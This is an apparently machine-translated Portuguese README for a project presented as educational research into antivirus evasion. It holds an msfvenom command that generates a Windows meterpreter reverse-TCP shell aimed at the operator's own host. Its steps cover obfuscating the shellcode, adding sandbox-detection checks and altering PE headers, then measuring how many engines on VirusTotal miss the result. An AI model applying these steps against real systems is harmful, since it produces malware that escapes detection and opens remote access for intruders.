Invismalware: Técnicas avançadas de evasão de malware
Índice
- Introdução
- Características
- Instalação
- Uso
- Metodologia Experimental
- Teste
- Contribuindo
- Licença
Introdução
O Invismalware é um projeto projetado para demonstrar técnicas avançadas de evasão de malware que ignoram a detecção de antivírus. Este experimento de malware orientado a pesquisas se concentra na utilização de métodos de ofuscação, como modificações de código e estratégias anti-areia, para evitar a detecção de malware estática e dinâmica.
Este projeto é apenas para fins educacionais , destinado a fornecer informações sobre as estratégias modernas de defesa de malware, aprendendo com as técnicas de evasão usadas por atores maliciosos.
Características
- Geração do Código Shell : Crie cargas úteis de shell reversa personalizadas usando o msfvenom.
- Código Ofuscation : Modifique o código de malware para evitar a detecção de antivírus adicionando NOPs, manipulando cabeçalhos de PE e muito mais.
- Análise anti-dinâmica : inclua verificações para detectar ambientes de sandbox, como driver de áudio e presença de dispositivo USB.
- Manipulação do cabeçalho do PE : Disfarçar o malware, ajustando o cabeçalho portátil executável (PE) para evitar a detecção baseada em assinatura.
- Cálculo da taxa de evasão : Meça a eficácia das técnicas de evasão comparando os resultados em vários motores antivírus.
Instalação
Para começar, clone o repositório e instale as dependências necessárias.
Pré -requisitos
- Python 3.x
- VirtualBox/VMware (para testes em ambientes virtuais)
- Metasploit Framework (para gerar shellcode)
- PE-BEAR (para manipulação do cabeçalho PE)
Clone o repositório
git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware
Instalar dependências
pip install -r requirements.txt
Uso
1. Gere Malware Shellcode
Use o msfvenom para gerar o código shell reverso do TCP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c
2. Modifique o código de shell
Edite o arquivo evilexp.c para ofuscar o código e evitar a detecção.
3. Corra na máquina virtual
Implante o malware em uma máquina virtual segura e isolada para testar seu comportamento e medir as taxas de detecção.
4. Carregue para Virustottal
Carregue seu malware para o Virustotal para avaliar sua taxa de evasão em vários motores antivírus.
Metodologia Experimental
O projeto segue uma metodologia de quatro estágios para obter evasão de malware:
- Geração do Código do Shell : Crie código de shell reverso de linha de base.
- Modificação de código : ofusque o código do shell para evitar a detecção.
- Análise anti-dinâmica : adicione a detecção de sandbox para ignorar as ferramentas de análise dinâmica.
- Modificação do cabeçalho do PE : Altere o cabeçalho do PE para ofuscar ainda mais a assinatura de malware.
Teste
Teste local
Execute o malware em sua máquina virtual equipada com software antivírus, como Kaspersky , Windows Defender ou Bitdefender .
Testes Virustostais
Carregue o malware modificado para o Virustotal e verifique quantos motores antivírus o detectam com sucesso.
Contribuindo
Congratulamo -nos com contribuições para melhorar o projeto. Se você quiser contribuir:
- Fork o repositório.
- Crie uma nova ramificação para o seu recurso ou correção de bug.
- Envie uma solicitação de tração com informações detalhadas sobre suas alterações.
Licença
Este projeto está licenciado sob a licença do MIT. Consulte o arquivo de licença para obter detalhes.